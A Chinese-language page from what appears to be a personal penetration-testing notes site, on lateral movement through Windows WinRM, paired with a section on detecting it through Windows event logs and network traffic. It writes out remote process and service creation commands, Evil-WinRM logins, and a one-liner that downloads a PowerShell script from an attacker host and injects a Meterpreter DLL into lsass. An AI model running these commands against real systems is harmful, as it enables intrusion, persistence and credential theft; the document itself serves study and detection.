🔬
JTZ
  • 启航
    • 💻介绍
    • 🔧路径以及总结
    • 🏆日记
      • 😀2022-12-26
      • 😀2022-11-13
      • 😀2022-11-4
  • 网络&系统
    • 🔧端口&协议
      • NFS 介绍
      • Kerberos 介绍
      • WINRM 介绍
      • Telnet 协议
      • CDN 介绍
      • ICMP 介绍
      • DNS
      • RDP
      • SNMP
      • FTP
      • SMB
      • WMI
      • SSH
    • 🔧计算机网络
      • 计算机网络
        • 什么是网络
          • 什么是网络
          • 什么是交换机
          • 什么是路由器
          • 什么是防火墙
        • Model
          • 什么是TCP/IP模型?什么是OSI模型?
        • IP
          • IP地址
      • 资源
        • Postman
        • 思科模拟器 8.2
        • Cisco Packet Tracer
        • 视频
        • WireShark
      • 协议
        • MAC
        • DHCP
        • 端口转发
        • ARP
        • ICMP
      • 第一章--概述
      • 第二章--物理层
      • 第三章--数据链路层
      • 第四章--网络层
      • 第五章--传输层
      • 第六章--应用层
    • 🔧操作系统
    • 🔧Windows
      • 工具
        • WSL 安装 kail
          • Windows 端口转发 WSL 流量
          • 使用远程桌面连接 kali
        • VMware
        • WizTree
        • Beyond Compare 4
        • 画图软件
        • 记笔记软件
          • Typora 插件
          • Typora 图床
        • 文本编辑器
        • 视频播放器
        • VPN
        • 录屏工具
        • Wise Disk Cleaner
        • WinHex
        • Custom Cursor
        • RAMMap
        • Snipaste
        • PowerTotys
        • 浏览器
          • 浏览器插件
      • Windows
    • 🔧Linux
      • 杂类
        • linux中mnt,media以及dev目录的区别
        • 如何在 SSH 身份验证后运行脚本
        • 探索 Reverse SHELL
        • 恢复文件
        • PID 介绍
        • sudo配置文件/etc/sudoers
        • 定时任务
      • 权限
        • Linux 访问控制列表 (ACL) 简介
      • 目录
        • /mnt
        • /media
        • /etc
        • /usr
        • /proc
      • 工具推荐
        • linux下使用clash(GUI)
        • 终端模拟程序
      • Linux命令
        • 查看文件信息
        • 磁盘信息
      • Linux
  • 工具
    • 🔧端口&服务
      • 22 -- SSH
        • ssh-audit
      • 25/465/587 -- SMTP/s
        • SMTP 命令
        • sendEmail
        • swaks
      • 53 -- DNS
      • 80/443 -- WEB 服务
        • CURL
        • CMS
          • droopescan
          • JoomlaScan
          • WPScan
        • 扫描工具
          • feroxbuster
          • WFUZZ
          • gobuster
          • FFUF
      • 88 tcp/udp -- Kerberos
      • 139/445 -- SMB
        • enum4linux-ng
        • smbClient
        • smbmap
        • rpcclient
      • 873--Rsync
        • Rsync
      • 2049-TCP/UDP-NFS
        • NFS no_root_squash/no_all_squash 错误配置
      • 5985/5986 -- WINRM
        • evil-winrm
        • 内网移动
      • 云服务
        • AWS
    • 端口扫描
      • masscan
      • nmap
        • 研究
        • nmap-common
        • ndiff
        • nping
    • SHELL
      • Windows 交互 SHELL
      • pwncat-cs
      • Netcat
      • MSF
      • Socat
    • 脚本工具包
      • 🔧Impacket
        • Hunting for Impacket
    • 📖字典
      • CEWL
    • 自动化扫描工具
      • nikto
      • SQLMAP
    • 密码&解密&爆破
      • 识别 Hash
        • hash-identifier
        • hashid
      • 破解 Hash
        • John
        • Hashcat
        • Hydra
      • DomainPasswordSpray
    • 渗透框架工具
      • Searchsploit
      • Metasploit
        • Msfvenom
    • 文件
      • Imagemagick
      • Exiftool
    • 开发工具
      • Git
    • 浏览器
      • 浏览器密码&历史等信息
    • crackmapexec
    • OPENSSL
      • Heartbleed
    • 文件隐写术
      • binwalk
      • Exiftool
      • Steghide
    • 频谱分析
  • 🛸权限提升
    • 🔧Active Directory
      • 🦯AD 枚举和攻击 -- 工具
        • BloodHound
        • Kerbrute
    • 🔧Windows
      • 🦯Windows 权限提升工具
    • 🔧Linux
      • 提权
        • Linux 提权思路
        • Linux 提权备忘录
      • 资料
        • Linux 权限: SUID, SGID, sticky
      • 🦯Linux 提权工具
        • 📱Pspy
  • 🕶️HTB 学院
    • SHELLS&Payloads
    • 文件传输
    • 足迹
    • Pivoting &隧道和端口转发
    • 密码攻击
  • 🖥️WEB 渗透测试
    • 命令注入(RCE)
      • 🚚资源
    • 身份验证
    • 信息泄露
      • 信息泄露工具
    • XXE
      • 资源
      • XML 介绍
    • XSS
      • 资源
    • IDOR
    • CORS
      • 资源
    • IDOR
    • SSRF
      • 资源
    • Page 1
    • 目录遍历
    • 访问控制
    • 文件上传
      • 资源
      • WAF 绕过
    • 点击劫持
    • CSRF
      • 资源
        • 同源策略
    • SSTI
      • 资源
    • WebSocket
    • 逻辑缺陷
    • 反序列化
    • 文件包含
      • /proc/self/envirom
    • 文件隐写术
  • 🔧编程语言
    • 编程工具
      • Vs-Code
      • Jetbrains
      • Navicat Premium 15
    • C/C++
      • Linux C 一站式编程学习
    • Java
      • 资源
        • JDK
        • 画类图软件
    • Python
      • 资源
        • Python 环境
        • Python 虚拟环境
    • SHELL 教程
      • SHELL 教程
      • 高级Bash脚本编程指南
      • 1.1 变量
      • 1.2 特殊字符
      • 1.3 正则表达式
      • 1.4 数组
      • 1.5 字符串
      • 1.6 函数
      • 1.7 循环判断
      • 扩展
        • 执行命令
        • 子 SHELL
  • 🔧云开发
    • 🔧Docker
      • 🔧Docker
  • 🔧信息收集
    • 网站内容
    • OSINT
    • 侦查
      • Shodan.io
      • google 语法
    • 子域枚举
      • dig
  • 🔧逆向
    • 工具
      • GDB
        • PEDA
      • ghidra
  • 🔧杂章
    • 杂章
      • 区域传输
      • XFF&Referer
      • VHOST
      • ASN
      • Shadow Defender
      • WinHex
由 GitBook 提供支持
在本页
  • 通过 WINRM 直接进行横向移动
  • 通过 WinRM 间接进行横向移动
  • WinRM 活动的捕获&检测
  • 通过Windows日志检测WinRM活动
  • 通过网络流量检测WinRM活动
  • 参考文章

这有帮助吗?

在GitHub上编辑
  1. 工具
  2. 端口&服务
  3. 5985/5986 -- WINRM

内网移动

WINRM 服务提供远程执行系统命令的特点,使得在内网环境下的横向移动变的极为方便

通过 WINRM 直接进行横向移动

在winrm.vbs的参数选项中有一个invoke参数,此操作允许使用WinRM对目标对象执行特定方法。执行命令winrm invoke Create wmicimv2/win32_process @{CommandLine="calc.exe"}将会在本地弹出计算器:

该命令调用Windows WMI中Win32_process类的Create方法,生成了一个calc.exe的新进程。通过这种方式,可以使用WinRM在远程Windows服务器上起一个新进程。例如执行:

winrm invoke Create wmicimv2/win32_process @{CommandLine="calc.exe"} -r:http://10.0.83.30:5985 -u:administrator -p:123456

可以在远程在Windows服务器上运行一个静默执行的calc.exe新进程:

同样,也可以调用Win32_service类的Create方法,以生成服务的形式运行特定程序。首先执行以下命令创建服务:

winrm invoke Create wmicimv2/Win32_Service @{Name="test";DisplayName="test";PathName="cmd.exe /k c:\windows\system32\calc.exe"} -r:http://10.0.83.30:5985 u:administrator -p:123456

接着执行下面的命令运行服务:

winrm invoke StartService wmicimv2/Win32_Service?Name=test -r:http://10.0.83.30:5985 u:administrator -p:123456

使用上述方法即可控制远程主机下载远控后门并达到持续渗透和权限维持的目的。

通过 WinRM 间接进行横向移动

在第一节的配置环境基础上,下面测试使用PowerShell远程获得Windows服务器的交互式PowerShell,这首先需要确保Windows服务器正在运行WinRM服务并允许PowerShell被远程连接。可在Windows服务器的PowerShell中执行 Enable-PSRemoting –force 开启PowerShell的远程连接:

此时,在另一台Windows主机上使用PowerShell执行 Enter-PSSession -ComputerName 10.0.83.30 -Credential administrator即可连接至这台Windows服务器,在弹框中输入密码,获得这台Windows服务器的交互式PowerShell:

此过程的流程图如下:

WinRM在这里作为通道连接了两端的PowerShell。当然,在红队角度来说,工具是千变万化的。

接下来我们尝试通过Evil-WinRM工具连接远程Windows服务器的WinRM服务并获得交互式PowerShell。克隆项目后执行命令ruby evil-wnrm.rb -i 10.0.83.30 -u administrator -p 123456即可连接至运行WinRM服务的Windows服务器:

另外,Evil-WinRM提供了一个menu命令,可通过加载Invoke-Binary和l04d3r-LoadDll两个自定义函数,实现无文件执行PE文件和DLL加载,但实际测试时这两个函数无法稳定使用,加载Meterpreter Payload会出现报错情况。

当然还有更优雅的方式,例如使用PowerSploit。

在Evil-WinRM的交互式Shell中直接执行:

IEX (New-Object Net.WebClient).DownloadString('http://10.0.84.102:8000/Invoke-ReflectivePEInjection.ps1');Invoke-ReflectivePEInjection -PEUrl http://10.0.84.102:8000/t0y.dll -procname lsass

此时将下载Invoke-ReflectivePEInjection.ps1执行,并将t0y.dll注入到lsass进程中:

至此,DLL文件被注入进目标Windows服务器的内存并获得Meterpreter Shell。当然,也可以直接使用PowerSploit完成对网络的进一步探测。例如使用Recon模块对内网主机端口扫描:

或者尝试获取域控制器的密码等等:

可见,透过WinRM服务可以使用多种渗透框架对目标网络进行渗透攻击,此时WinRM更像是一个通道或者一扇门。

WinRM 活动的捕获&检测

以第二节的攻击活动作为基础,尝试从Windows日志以及流量层面检测使用WinRM服务进行的横向移动。

通过Windows日志检测WinRM活动

使用WinRM服务时,Windows会在两个位置记录相关日志,分别为%SystemRoot%\System32\Winevt\Logs\Security.evtxWindows安全事件日志及%SystemRoot%\System32\Winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtxWinRM服务操作日志。

为方便测试,先分别清空本地Windows主机和远程Windows服务器的这两处日志。以PowerShell Remoting为例,从本地Windows主机登录远程Windows服务器执行一条系统命令ipconfig后退出,随后查看此过程产生的日志。

在安全事件日志中产生了三次事件ID为4648的Windows登录事件,被登录主机为WIN-IMRNLMU4L5U,并且指向PowerShell进程:

4648事件是Windows用于记录显式凭据登录的事件,并且无论登录是否成功都会记录。由于PowerShell Remoting会使用显式的弹框提示用户输入登录远程主机的账户密码,因此产生此日志。

WinRM服务操作日志中记录了与WinRM服务所有相关的操作,并且从时间线上依次有WSMan初始化、WSMan API调用(初始化建立连接)、用户身份验证请求及响应、WSMan API调用(具体操作)请求及响应。从日志的详情中能看到每一次操作的具体情况,例如客户端发送命令给远程主机:

在远程Windows服务器上,再来看这两个日志。

与发起登录的Windows主机不同,这里安全事件日志上分别生成了事件ID为4776、4672、4624、4634的四种日志,分别对应凭据验证、特殊登录、登录及注销四个事件,并且也都产生了三次。

4776事件记录远程主机发送验证包进行NTLM验证的过程,发送的验证包为为MICROSOFT_AUTHENTICATION_PACKAGE_V1_0。4672事件记录Windows赋予登录账户特殊权限的过程,在使用PowerShell Remoting登录的过程中,Windows服务器赋予登录账户特殊权限,并形成与管理员账户的某些等效特权(但并不完全等同于管理员账户):

4624事件是账号成功登录的标志,4643事件则是账户退出登录的标志。

综合这四个事件的日志可以判断,一台Windows主机使用NTLM认证的方式成功登录了当前Windows服务器,并拥有一定的管理员特权。

转向WinRM服务操作日志,这里只记录了四个事件,只能看到WSMan API被调用并给出响应,不够详细:

从两台主机的日志可以看出,WinRM服务连接的请求发起方记录明显要比被连接方更详细,远程Windows服务器作为被攻击主机,在日志上只能记录Windows远程登录的详细情况,而无法记录WinRM操作较详细的过程,这对横向移动的检测明显不利。

通过网络流量检测WinRM活动

我们通过winrm的invoke参数在远程Windows服务器上生成一个运行计算器程序的进程,并在此Windows服务器上捕获过程中产生的网络流量。

从图中可以看到,客户端PC使用NTLM认证登录Windows服务器,并随后向其发送了经过加密的WS-Management协议消息。由于会话进行了加密,因此无法从流量内容中解密出具体的操作请求与响应内容:

POST /wsman HTTP/1.1
Authorization: Negotiate TlRMTVNTUAADAAAAGAAYAK4AAAAIAQgBxgAAAB4AHgBYAAAAGgAaAHYAAAAeAB4AkAAAABAAEADOAQAANYKI4gYAchcAAAAPQA/P/h+iVrUOR96DLmXOKlcASQBOAC0ATwBNAFoASwBLAE8ANQBTADIAVwBIAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAVwBJAE4ALQBPAE0AWgBLAEsATwA1AFMAMgBXAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA9MKfRjLb04PzgEvw8c8H3AEBAAAAAAAAONk/OuNt1QFYO76+xRQ5LQAAAAACAB4AVwBJAE4ALQBJAE0AUgBOAEwATQBVADQATAA1ADEAAQAeAFcASQBOAC0ASQBNAFIATgBMAE0AVQA0AEwANQAxAAQAHgBXAEkATgAtAEkATQBSAE4ATABNAFUANABMADUAMQADAB4AVwBJAE4ALQBJAE0AUgBOAEwATQBVADQATAA1ADEABwAIADjZPzrjbdUBBgAEAAIAAAAIADAAMAAAAAAAAAAAAAAAADAAAIc2vSJKkSPg+7uRSE04RPyCY4BjWZ4SV7AX5qGi9IZSAAAAAAAAAAAAAAAAFQ/q0cp5XKIemClSmHpBig==
Content-Type: multipart/encrypted;protocol="application/HTTP-SPNEGO-session-encrypted";boundary="Encrypted Boundary"
User-Agent: Microsoft WinRM Client
Host: 10.0.83.30:5985
Content-Length: 2586
Connection: Keep-Alive

--Encrypted Boundary
Content-Type: application/HTTP-SPNEGO-session-encrypted
OriginalContent: type=application/soap+xml;charset=UTF-16;Length=2330
--Encrypted Boundary
Content-Type: application/octet-stream
.............Q3R....3H......?.xL}..8.I
............................(此处省略)
[...3...a...|^.sDox'."...Bww.--Encrypted Boundary--
HTTP/1.1 200
Content-Type: multipart/encrypted;protocol="application/HTTP-SPNEGO-session-encrypted";boundary="Encrypted Boundary"
Server: Microsoft-HTTPAPI/2.0
Date: Wed, 18 Sep 2019 05:37:57 GMT
Content-Length: 2202

--Encrypted Boundary
Content-Type: application/HTTP-SPNEGO-session-encrypted
OriginalContent: type=application/soap+xml;charset=UTF-16;Length=1946
--Encrypted Boundary
Content-Type: application/octet-stream
.........t3.d.O...../....-....N7C..B....2.....r.
.............................(此处省略)
...DP.....@...A..e...Z....6.7...M.l|.PU...vA.J...7.T...--Encrypted Boundary--

经过测试,使用PowerShell Remoting、Evil-WinRM工具产生的WinRM连接流量均与之类似。可见在WinRM服务未开启监听HTTPS端口的情况下,Windows依然会加密WinRM会话以保证通信数据的完整性。不过,仍然可以通过HTTP请求与响应中的明文部分捕获WinRM认证及操作的行为,例如Microsoft WinRM Client、Encrypted Boundary、HTTP-SPNEGO-session-encrypted等关键字,并以此进行关联产生侦测到WinRM服务成功调用的预警。

参考文章

上一页evil-winrm下一页云服务

最后更新于2年前

这有帮助吗?

Python与Ruby均有支持WinRM操作的库,这使得连接WinRM的方式将更加灵活,攻击活动将被控制在命令行中。例如GitHub上的开源工具,使用WinRM的ruby库winrm及winrm-fs,可以通过WinRM服务快速获得一个交互式Shell,并支持PowerShell的全部命令。

首先,生成一个包含Meterpreter Payload的DLL文件t0y.dll。接着通过python -m SimpleHTTPServer 8000开启临时HTTP服务,将修改后的反射DLL文件注入脚本Invoke-ReflectivePEInjection.ps1与t0y.dll一同放置在目录下,以便使远程服务器获取。使MSF监听本地端口以得到Meterpreter会话:

借助WinRM服务进行的内网横移活动,日志层面监控需要借助新的工具来实现记录,例如。从日本Cert/CC的可以看到,Sysmon能较完整的记录WinRM服务的操作日志。

🔧
Evil-WinRM
@clymb3r
Sysmon
研究
内网横移之 WINRM